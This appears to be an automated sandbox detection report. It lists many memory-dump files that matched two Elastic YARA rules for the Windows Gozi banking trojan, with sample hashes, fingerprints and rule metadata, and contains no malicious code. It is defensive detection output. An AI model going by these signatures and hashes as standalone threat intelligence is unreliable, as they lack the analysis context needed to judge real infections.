Source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
